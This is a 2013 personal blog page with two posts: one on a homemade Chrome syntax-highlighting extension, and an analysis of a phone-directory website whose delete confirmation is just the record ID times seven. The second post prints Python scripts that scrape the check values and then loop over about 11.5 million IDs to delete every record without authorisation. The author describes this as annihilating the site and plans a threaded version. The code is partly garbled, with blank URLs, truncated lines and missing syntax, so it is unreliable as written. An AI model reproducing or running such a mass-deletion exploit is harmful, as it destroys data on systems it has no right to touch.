Saturday, 23 March 2013


After testing blogger I observed that it doesn't recognize the [code] tags used to syntax-highlight code (like wordpress), and there are a few alternatives like adding some lines to the template code or using an online service to generate syntax-highlighted HTML for your code.

I wrote a Chrome extension that allows you to syntax-highlight code. It makes a POST request to the API at with the code body, language,style etc and all processing happens server-side. uses pygments at its core.

It's a popup window that allows you to paste code, select language and highlighting colour scheme.

Clicking the Highlight button will replace the code in the textarea with the generated HTML and show a preview below.

Download (Load unpacked extension in Chrome and point to the extracted folder)

Have any suggestions, issues, bugs , requests? :

This is by no means a finished product, and I will probably publish it to the Chrome web store once stable.

Friday, 22 March 2013

Analysis of a Bad web-app

Alright, I can't really call this an app, it's more like a search engine ... that allows you delete its records.

 This website pissed me off as it makes ~11.5 million telephone records and related information(name,address) publicly searchable and indexable. I guess Google has already indexed all of the pages, and even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I can go on about how this is a privacy issue but I'll leave that for another post.


 There's a tiny delete button at the bottom that takes you to such a page.

 There's an id parameter (passed through the content body) associated with each telephone record, which I suppose is the database id of the record. The numbers of the equation are a textual part of the DOM and can be scraped to automate deletion of a record. I wrote a Python script to parse the HTML using regex and retrieve those numbers:

    equation = re.compile('([0-9]*[0-9]+)\ \+\ ([0-9]*[0-9]+)')
    p_url = ''

    for counter in range(800000,800005):
        params = {
            'Remove this entry':'Remove this number from the site'
        req = urllib2.Request(url=p_url,data=urllib.urlencode(params))
        phunwa = urllib2.urlopen(req)
        source =
        numbers = equation.findall(source)
        for num in numbers:
            print "id: %s | %s + %s = %s" % \

Which gives the following output:

id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028

For each increment of the id, the answer increments by 7(even though the two numbers themselves are generated different each time) which can only mean one thing:

Whoever designed this thing never heard of re-captcha. It doesn't even verify if the referrer(which is the URL containing the phone-number associated with the id) is correct, but that's too much to ask for considering the confirmation method they chose to implement is answer = id*7

The total number of records could be around 11,547,208. That's the highest the id goes to before returning a 500. In theory, it is thus possible to delete every record on without user-intervention at any point. Except for hiring an EC2 instance and running this script.

import re
import urllib
import urllib2

def annihilate_phunwa():
  p_url = ''

  for counter in range(1,11547209):
    params = {
      'answer' : (counter*7),
      'Confirm Delete' : 'Submit Query'
      req = urllib2.Request(url=p_url,data=urllib.urlencode(params))
      phunwa = urllib2.urlopen(req)
    except urllib2.HTTPError,e:
      if e.hdrs['Status'] == '500':
        print 'id=%s may already be deleted!' % ((counter,))
      else: print 'Something else has gone wrong!'


I may update this code with one that implements threading.